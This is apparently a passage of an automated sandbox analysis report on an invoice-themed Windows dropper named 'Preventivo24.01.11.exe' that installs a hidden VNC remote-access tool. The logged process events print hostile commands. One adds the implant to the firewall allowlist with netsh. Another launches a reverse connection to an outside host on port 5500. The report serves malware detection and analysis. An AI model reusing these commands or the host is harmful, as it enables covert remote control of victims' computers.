ProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces41_2_000CB8D0
Source: C:\Games\taskhost.exeCode function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces41_2_000CB8D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009A48360_3_009A4836
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009A49420_3_009A4942
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009700AC0_3_009700AC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009702510_3_00970251
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010024400_2_01002440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE90800_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E814900_2_00E81490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAF6F00_2_00EAF6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC59100_2_00FC5910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FD7CE00_2_00FD7CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FD3C500_2_00FD3C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0101C3F00_2_0101C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010202100_2_01020210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EBE4E00_2_00EBE4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010AC5E20_2_010AC5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0109A7D00_2_0109A7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EB66000_2_00EB6600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EB27430_2_00EB2743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010A29F30_2_010A29F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010188000_2_01018800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0106CA100_2_0106CA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EC2BA00_2_00EC2BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0102CA500_2_0102CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01092DEE0_2_01092DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EB4E400_2_00EB4E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01020FB00_2_01020FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0100CED00_2_0100CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0109317C0_2_0109317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAB0900_2_00EAB090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAF1800_2_00EAF180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA33900_2_00EA3390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E834800_2_00E83480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010294700_2_01029470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010736500_2_01073650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EBF7400_2_00EBF740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC37500_2_00FC3750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0101DA000_2_0101DA00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F99B500_2_00F99B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F03B100_2_00F03B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E87AA00_2_00E87AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0101FFD00_2_0101FFD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAFF500_2_00EAFF50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0101DEF00_2_0101DEF0
Source: C:\Games\viewer.exeCode function: 6_2_006167A06_2_006167A0
Source: C:\Games\viewer.exeCode function: 6_2_006400406_2_00640040
Source: C:\Games\viewer.exeCode function: 6_2_0063E0E06_2_0063E0E0
Source: C:\Games\viewer.exeCode function: 6_2_006491516_2_00649151
Source: C:\Games\viewer.exeCode function: 6_2_0063B1CB6_2_0063B1CB
Source: C:\Games\viewer.exeCode function: 6_2_0061C3406_2_0061C340
Source: C:\Games\viewer.exeCode function: 6_2_0063B3FD6_2_0063B3FD
Source: C:\Games\viewer.exeCode function: 6_2_006367B06_2_006367B0
Source: C:\Games\viewer.exeCode function: 6_2_006518046_2_00651804
Source: C:\Games\viewer.exeCode function: 6_2_006418B46_2_006418B4
Source: C:\Games\viewer.exeCode function: 6_2_006519246_2_00651924
Source: C:\Games\viewer.exeCode function: 6_2_0061DD006_2_0061DD00
Source: C:\Games\viewer.exeCode function: 6_2_0064FDE46_2_0064FDE4
Source: C:\Games\viewer.exeCode function: 6_2_00654EF06_2_00654EF0
Source: C:\Games\viewer.exeCode function: 6_2_0061FF006_2_0061FF00
Source: C:\Games\viewer.exeCode function: 6_2_00649F096_2_00649F09
Source: C:\Games\taskhost.exeCode function: 41_2_0016282041_2_00162820
Source: C:\Games\taskhost.exeCode function: 41_2_0015F0D041_2_0015F0D0
Source: C:\Games\taskhost.exeCode function: 41_2_001DA97441_2_001DA974
Source: C:\Games\taskhost.exeCode function: 41_2_000BD9F041_2_000BD9F0
Source: C:\Games\taskhost.exeCode function: 41_2_001E5A2B41_2_001E5A2B
Source: C:\Games\taskhost.exeCode function: 41_2_0015FA5041_2_0015FA50
Source: C:\Games\taskhost.exeCode function: 41_2_001C436241_2_001C4362
Source: C:\Games\taskhost.exeCode function: 41_2_001E23F941_2_001E23F9
Source: C:\Games\taskhost.exeCode function: 41_2_001CA65041_2_001CA650
Source: C:\Games\taskhost.exeCode function: 41_2_000BD70041_2_000BD700
Source: C:\Games\taskhost.exeCode function: 41_2_001C3FD441_2_001C3FD4
Source: C:\Games\viewer.exeCode function: String function: 00635126 appears 56 times
Source: C:\Games\viewer.exeCode function: String function: 00635630 appears 40 times
Source: C:\Games\viewer.exeCode function: String function: 006350F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00E8A880 appears 58 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00E8AEE0 appears 67 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00E887F0 appears 50 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00E89320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00EA5220 appears 35 times
Source: C:\Games\taskhost.exeCode function: String function: 000BCCB0 appears 34 times
Source: Preventivo24.01.11.exeStatic PE information: invalid certificate
Source: taskhost.exe.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Preventivo24.01.11.exe, 00000000.00000003.1685751474.0000000007E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1638029413.000000000120B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685248284.0000000007E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685666367.0000000007E1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685503614.0000000007E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B101000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exeBinary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeSection loaded: lpk.dllJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: Preventivo24.01.11.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: shi6E82.tmp.0.drBinary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: timeout.exe, 00000036.00000002.2263167469.0000000000658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .CMD;.VBP~
Source: classification engineClassification label: mal76.rans.troj.evad.winEXE@110/77@8/5
Source: ~.pdf.0.drInitial sample: http://www.pdf-tools.com\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC0AF0 FormatMessageW,GetLastError,0_2_00FC0AF0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF4BE0 GetDiskFreeSpaceExW,0_2_00FF4BE0
Source: C:\Games\viewer.exeCode function: 6_2_00613710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,6_2_00613710
Source: C:\Games\viewer.exeCode function: 6_2_006149C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,6_2_006149C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E8A740 LoadResource,LockResource,SizeofResource,0_2_00E8A740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax VnJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Games\taskhost.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\upd65B7.tmpJump to behavior
Source: C:\Games\viewer.exeCommand line argument: Ae6_2_00654140
Source: Preventivo24.01.11.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Preventivo24.01.11.exeVirustotal: Detection: 17%
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile read: C:\Users\user\Desktop\Preventivo24.01.11.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: unknownProcess created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="Jump to behavior
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "Jump to behavior
